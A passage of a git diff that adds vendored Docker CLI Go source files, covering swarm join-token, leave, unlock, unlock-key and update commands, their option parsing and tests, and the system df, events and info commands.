fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.") + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go new file mode 100644 index 0000000000..3a17a8020f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go @@ -0,0 +1,105 @@ +package swarm + +import ( + "errors" + "fmt" + + "github.com/spf13/cobra" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "golang.org/x/net/context" +) + +func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command { + var rotate, quiet bool + + cmd := &cobra.Command{ + Use: "join-token [OPTIONS] (worker|manager)", + Short: "Manage join tokens", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + worker := args[0] == "worker" + manager := args[0] == "manager" + + if !worker && !manager { + return errors.New("unknown role " + args[0]) + } + + client := dockerCli.Client() + ctx := context.Background() + + if rotate { + var flags swarm.UpdateFlags + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + flags.RotateWorkerToken = worker + flags.RotateManagerToken = manager + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) + if err != nil { + return err + } + if !quiet { + fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0]) + } + } + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + if quiet { + if worker { + fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker) + } else { + fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager) + } + } else { + info, err := client.Info(ctx) + if err != nil { + return err + } + return printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager) + } + return nil + }, + } + + flags := cmd.Flags() + flags.BoolVar(&rotate, flagRotate, false, "Rotate join token") + flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") + + return cmd +} + +func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error { + client := dockerCli.Client() + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + node, _, err := client.NodeInspectWithRaw(ctx, nodeID) + if err != nil { + return err + } + + if node.ManagerStatus != nil { + if worker { + fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr) + } + if manager { + fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go new file mode 100644 index 0000000000..e2cfa0a045 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/leave.go @@ -0,0 +1,44 @@ +package swarm + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type leaveOptions struct { + force bool +} + +func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := leaveOptions{} + + cmd := &cobra.Command{ + Use: "leave [OPTIONS]", + Short: "Leave the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runLeave(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, ignoring warnings") + return cmd +} + +func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + if err := client.SwarmLeave(ctx, opts.force); err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), "Node left the swarm.") + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go new file mode 100644 index 0000000000..9db46dcf55 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/opts.go @@ -0,0 +1,209 @@ +package swarm + +import ( + "encoding/csv" + "errors" + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" +) + +const ( + defaultListenAddr = "0.0.0.0:2377" + + flagCertExpiry = "cert-expiry" + flagDispatcherHeartbeat = "dispatcher-heartbeat" + flagListenAddr = "listen-addr" + flagAdvertiseAddr = "advertise-addr" + flagQuiet = "quiet" + flagRotate = "rotate" + flagToken = "token" + flagTaskHistoryLimit = "task-history-limit" + flagExternalCA = "external-ca" + flagMaxSnapshots = "max-snapshots" + flagSnapshotInterval = "snapshot-interval" + flagLockKey = "lock-key" + flagAutolock = "autolock" +) + +type swarmOptions struct { + taskHistoryLimit int64 + dispatcherHeartbeat time.Duration + nodeCertExpiry time.Duration + externalCA ExternalCAOption + maxSnapshots uint64 + snapshotInterval uint64 + autolock bool +} + +// NodeAddrOption is a pflag.Value for listening addresses +type NodeAddrOption struct { + addr string +} + +// String prints the representation of this flag +func (a *NodeAddrOption) String() string { + return a.Value() +} + +// Set the value for this flag +func (a *NodeAddrOption) Set(value string) error { + addr, err := opts.ParseTCPAddr(value, a.addr) + if err != nil { + return err + } + a.addr = addr + return nil +} + +// Type returns the type of this flag +func (a *NodeAddrOption) Type() string { + return "node-addr" +} + +// Value returns the value of this option as addr:port +func (a *NodeAddrOption) Value() string { + return strings.TrimPrefix(a.addr, "tcp://") +} + +// NewNodeAddrOption returns a new node address option +func NewNodeAddrOption(addr string) NodeAddrOption { + return NodeAddrOption{addr} +} + +// NewListenAddrOption returns a NodeAddrOption with default values +func NewListenAddrOption() NodeAddrOption { + return NewNodeAddrOption(defaultListenAddr) +} + +// ExternalCAOption is a Value type for parsing external CA specifications. +type ExternalCAOption struct { + values []*swarm.ExternalCA +} + +// Set parses an external CA option. +func (m *ExternalCAOption) Set(value string) error { + parsed, err := parseExternalCA(value) + if err != nil { + return err + } + + m.values = append(m.values, parsed) + return nil +} + +// Type returns the type of this option. +func (m *ExternalCAOption) Type() string { + return "external-ca" +} + +// String returns a string repr of this option. +func (m *ExternalCAOption) String() string { + externalCAs := []string{} + for _, externalCA := range m.values { + repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL) + externalCAs = append(externalCAs, repr) + } + return strings.Join(externalCAs, ", ") +} + +// Value returns the external CAs +func (m *ExternalCAOption) Value() []*swarm.ExternalCA { + return m.values +} + +// parseExternalCA parses an external CA specification from the command line, +// such as protocol=cfssl,url=https://example.com. +func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) { + csvReader := csv.NewReader(strings.NewReader(caSpec)) + fields, err := csvReader.Read() + if err != nil { + return nil, err + } + + externalCA := swarm.ExternalCA{ + Options: make(map[string]string), + } + + var ( + hasProtocol bool + hasURL bool + ) + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + + if len(parts) != 2 { + return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + key, value := parts[0], parts[1] + + switch strings.ToLower(key) { + case "protocol": + hasProtocol = true + if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) { + externalCA.Protocol = swarm.ExternalCAProtocolCFSSL + } else { + return nil, fmt.Errorf("unrecognized external CA protocol %s", value) + } + case "url": + hasURL = true + externalCA.URL = value + default: + externalCA.Options[key] = value + } + } + + if !hasProtocol { + return nil, errors.New("the external-ca option needs a protocol= parameter") + } + if !hasURL { + return nil, errors.New("the external-ca option needs a url= parameter") + } + + return &externalCA, nil +} + +func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) { + flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit") + flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)") + flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)") + flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints") + flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain") + flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots") +} + +func (opts *swarmOptions) mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) { + if flags.Changed(flagTaskHistoryLimit) { + spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit + } + if flags.Changed(flagDispatcherHeartbeat) { + spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat + } + if flags.Changed(flagCertExpiry) { + spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry + } + if flags.Changed(flagExternalCA) { + spec.CAConfig.ExternalCAs = opts.externalCA.Value() + } + if flags.Changed(flagMaxSnapshots) { + spec.Raft.KeepOldSnapshots = &opts.maxSnapshots + } + if flags.Changed(flagSnapshotInterval) { + spec.Raft.SnapshotInterval = opts.snapshotInterval + } + if flags.Changed(flagAutolock) { + spec.EncryptionConfig.AutoLockManagers = opts.autolock + } +} + +func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec { + var spec swarm.Spec + opts.mergeSwarmSpec(&spec, flags) + return spec +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go new file mode 100644 index 0000000000..568dc87302 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go @@ -0,0 +1,37 @@ +package swarm + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestNodeAddrOptionSetHostAndPort(t *testing.T) { + opt := NewNodeAddrOption("old:123") + addr := "newhost:5555" + assert.NilError(t, opt.Set(addr)) + assert.Equal(t, opt.Value(), addr) +} + +func TestNodeAddrOptionSetHostOnly(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set("newhost")) + assert.Equal(t, opt.Value(), "newhost:2377") +} + +func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set("::1")) + assert.Equal(t, opt.Value(), "[::1]:2377") +} + +func TestNodeAddrOptionSetPortOnly(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set(":4545")) + assert.Equal(t, opt.Value(), "0.0.0.0:4545") +} + +func TestNodeAddrOptionSetInvalidFormat(t *testing.T) { + opt := NewListenAddrOption() + assert.Error(t, opt.Set("http://localhost:4545"), "Invalid") +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go new file mode 100644 index 0000000000..048fb56e3d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go @@ -0,0 +1,54 @@ +package swarm + +import ( + "bufio" + "fmt" + "io" + "strings" + + "github.com/spf13/cobra" + "golang.org/x/crypto/ssh/terminal" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "golang.org/x/net/context" +) + +func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "unlock", + Short: "Unlock swarm", + Args: cli.ExactArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + client := dockerCli.Client() + ctx := context.Background() + + key, err := readKey(dockerCli.In(), "Please enter unlock key: ") + if err != nil { + return err + } + req := swarm.UnlockRequest{ + UnlockKey: key, + } + + return client.SwarmUnlock(ctx, req) + }, + } + + return cmd +} + +func readKey(in *command.InStream, prompt string) (string, error) { + if in.IsTerminal() { + fmt.Print(prompt) + dt, err := terminal.ReadPassword(int(in.FD())) + fmt.Println() + return string(dt), err + } + key, err := bufio.NewReader(in).ReadString('\n') + if err == io.EOF { + err = nil + } + return strings.TrimSpace(key), err +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go new file mode 100644 index 0000000000..96450f55b8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go @@ -0,0 +1,79 @@ +package swarm + +import ( + "fmt" + + "github.com/spf13/cobra" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command { + var rotate, quiet bool + + cmd := &cobra.Command{ + Use: "unlock-key [OPTIONS]", + Short: "Manage the unlock key", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + client := dockerCli.Client() + ctx := context.Background() + + if rotate { + flags := swarm.UpdateFlags{RotateManagerUnlockKey: true} + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + if !swarm.Spec.EncryptionConfig.AutoLockManagers { + return errors.New("cannot rotate because autolock is not turned on") + } + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) + if err != nil { + return err + } + if !quiet { + fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n") + } + } + + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + + if unlockKeyResp.UnlockKey == "" { + return errors.New("no unlock key is set") + } + + if quiet { + fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey) + } else { + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } + return nil + }, + } + + flags := cmd.Flags() + flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key") + flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") + + return cmd +} + +func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) { + if len(unlockKey) == 0 { + return + } + + fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey) + return +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go new file mode 100644 index 0000000000..dbbd268725 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/update.go @@ -0,0 +1,72 @@ +package swarm + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := swarmOptions{} + + cmd := &cobra.Command{ + Use: "update [OPTIONS]", + Short: "Update the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), opts) + }, + PreRunE: func(cmd *cobra.Command, args []string) error { + if cmd.Flags().NFlag() == 0 { + return pflag.ErrHelp + } + return nil + }, + } + + cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)") + addSwarmFlags(cmd.Flags(), &opts) + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var updateFlags swarm.UpdateFlags + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers + + opts.mergeSwarmSpec(&swarm.Spec, flags) + + curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags) + if err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), "Swarm updated.") + + if curAutoLock && !prevAutoLock { + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go new file mode 100644 index 0000000000..ab3beb895a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/cmd.go @@ -0,0 +1,26 @@ +package system + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSystemCommand returns a cobra command for `system` subcommands +func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "system", + Short: "Manage Docker", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewEventsCommand(dockerCli), + NewInfoCommand(dockerCli), + NewDiskUsageCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go new file mode 100644 index 0000000000..9f712484aa --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/df.go @@ -0,0 +1,56 @@ +package system + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type diskUsageOptions struct { + verbose bool +} + +// NewDiskUsageCommand creates a new cobra.Command for `docker df` +func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts diskUsageOptions + + cmd := &cobra.Command{ + Use: "df [OPTIONS]", + Short: "Show docker disk usage", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runDiskUsage(dockerCli, opts) + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage") + + return cmd +} + +func runDiskUsage(dockerCli *command.DockerCli, opts diskUsageOptions) error { + du, err := dockerCli.Client().DiskUsage(context.Background()) + if err != nil { + return err + } + + duCtx := formatter.DiskUsageContext{ + Context: formatter.Context{ + Output: dockerCli.Out(), + }, + LayersSize: du.LayersSize, + Images: du.Images, + Containers: du.Containers, + Volumes: du.Volumes, + Verbose: opts.verbose, + } + + duCtx.Write() + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go new file mode 100644 index 0000000000..087523051a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/events.go @@ -0,0 +1,140 @@ +package system + +import ( + "fmt" + "io" + "io/ioutil" + "sort" + "strings" + "text/template" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +type eventsOptions struct { + since string + until string + filter opts.FilterOpt + format string +} + +// NewEventsCommand creates a new cobra.Command for `docker events` +func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := eventsOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "events [OPTIONS]", + Short: "Get real time events from the server", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runEvents(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp") + flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template") + + return cmd +} + +func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error { + tmpl, err := makeTemplate(opts.format) + if err != nil { + return cli.StatusError{ + StatusCode: 64, + Status: "Error parsing format: " + err.Error()} + } + options := types.EventsOptions{ + Since: opts.since, + Until: opts.until, + Filters: opts.filter.Value(), + } + + ctx, cancel := context.WithCancel(context.Background()) + events, errs := dockerCli.Client().Events(ctx, options) + defer cancel() + + out := dockerCli.Out() + + for { + select { + case event := <-events: + if err := handleEvent(out, event, tmpl); err != nil { + return err + } + case err := <-errs: + if err == io.EOF { + return nil + } + return err + } + } +} + +func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { + if tmpl == nil { + return prettyPrintEvent(out, event) + } + + return formatEvent(out, event, tmpl) +} + +func makeTemplate(format string) (*template.Template, error) { + if format == "" { + return nil, nil + } + tmpl, err := templates.Parse(format) + if err != nil { + return tmpl, err + } + // we execute the template for an empty message, so as to validate + // a bad template like "{{.badFieldString}}" + return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{}) +} + +// prettyPrintEvent prints all types of event information. +// Each output includes the event type, actor id, name and action. +// Actor attributes are printed at the end if the actor has any. +func prettyPrintEvent(out io.Writer, event eventtypes.Message) error { + if event.TimeNano != 0 { + fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + } else if event.Time != 0 { + fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + } + + fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID) + + if len(event.Actor.Attributes) > 0 { + var attrs []string + var keys []string + for k := range event.Actor.Attributes { + keys = append(keys, k) + } + sort.Strings(keys) + for _, k := range keys { + v := event.Actor.Attributes[k] + attrs = append(attrs, fmt.Sprintf("%s=%s", k, v)) + } + fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", ")) + } + fmt.Fprint(out, "\n") + return nil +} + +func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { + defer out.Write([]byte{'\n'}) + return tmpl.Execute(out, event) +} diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go new file mode 100644 index 0000000000..e0b8767377 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/info.go @@ -0,0 +1,334 @@ +package system + +import ( + "fmt" + "sort" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/utils" + "github.com/docker/docker/utils/templates" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type infoOptions struct { + format string +} + +// NewInfoCommand creates a new cobra.Command for `docker info` +func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts infoOptions + + cmd := &cobra.Command{ + Use: "info [OPTIONS]", + Short: "Display system-wide information", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runInfo(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error { + ctx := context.Background() + info, err := dockerCli.Client().Info(ctx) + if err != nil { + return err + } + if opts.format == "" { + return prettyPrintInfo(dockerCli, info) + } + return formatInfo(dockerCli, info, opts.format) +} + +func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error { + fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers) + fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning) + fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused) + fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped) + fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver) + if info.DriverStatus != nil { + for _, pair := range info.DriverStatus { + fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1]) + + // print a warning if devicemapper is using a loopback file + if pair[0] == "Data loop file" { + fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.") + } + } + + } + if info.SystemStatus != nil { + for _, pair := range info.SystemStatus { + fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1]) + } + } + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver) + + fmt.Fprintf(dockerCli.Out(), "Plugins: \n") + fmt.Fprintf(dockerCli.Out(), " Volume:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + fmt.Fprintf(dockerCli.Out(), " Network:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + + if len(info.Plugins.Authorization) != 0 { + fmt.Fprintf(dockerCli.Out(), " Authorization:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + } + + fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState) + if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked { + fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID) + if info.Swarm.Error != "" { + fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error) + } + fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable) + if info.Swarm.ControlAvailable { + fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID) + fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers) + fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes) + fmt.Fprintf(dockerCli.Out(), " Orchestration:\n") + taskHistoryRetentionLimit := int64(0) + if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil { + taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit + } + fmt.Fprintf(dockerCli.Out(), " Task History Retention Limit: %d\n", taskHistoryRetentionLimit) + fmt.Fprintf(dockerCli.Out(), " Raft:\n") + fmt.Fprintf(dockerCli.Out(), " Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval) + if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil { + fmt.Fprintf(dockerCli.Out(), " Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots) + } + fmt.Fprintf(dockerCli.Out(), " Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick) + fmt.Fprintf(dockerCli.Out(), " Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick) + fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n") + fmt.Fprintf(dockerCli.Out(), " Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod))) + fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n") + fmt.Fprintf(dockerCli.Out(), " Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry)) + if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 { + fmt.Fprintf(dockerCli.Out(), " External CAs:\n") + for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs { + fmt.Fprintf(dockerCli.Out(), " %s: %s\n", entry.Protocol, entry.URL) + } + } + } + fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr) + managers := []string{} + for _, entry := range info.Swarm.RemoteManagers { + managers = append(managers, entry.Addr) + } + if len(managers) > 0 { + sort.Strings(managers) + fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n") + for _, entry := range managers { + fmt.Fprintf(dockerCli.Out(), " %s\n", entry) + } + } + } + + if len(info.Runtimes) > 0 { + fmt.Fprintf(dockerCli.Out(), "Runtimes:") + for name := range info.Runtimes { + fmt.Fprintf(dockerCli.Out(), " %s", name) + } + fmt.Fprint(dockerCli.Out(), "\n") + fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime) + } + + if info.OSType == "linux" { + fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", info.InitBinary) + + for _, ci := range []struct { + Name string + Commit types.Commit + }{ + {"containerd", info.ContainerdCommit}, + {"runc", info.RuncCommit}, + {"init", info.InitCommit}, + } { + fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID) + if ci.Commit.ID != ci.Commit.Expected { + fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected) + } + fmt.Fprintf(dockerCli.Out(), "\n") + } + if len(info.SecurityOptions) != 0 { + kvs, err := types.DecodeSecurityOptions(info.SecurityOptions) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Security Options:\n") + for _, so := range kvs { + fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name) + for _, o := range so.Options { + switch o.Key { + case "profile": + if o.Value != "default" { + fmt.Fprintf(dockerCli.Err(), " WARNING: You're not using the default seccomp profile\n") + } + 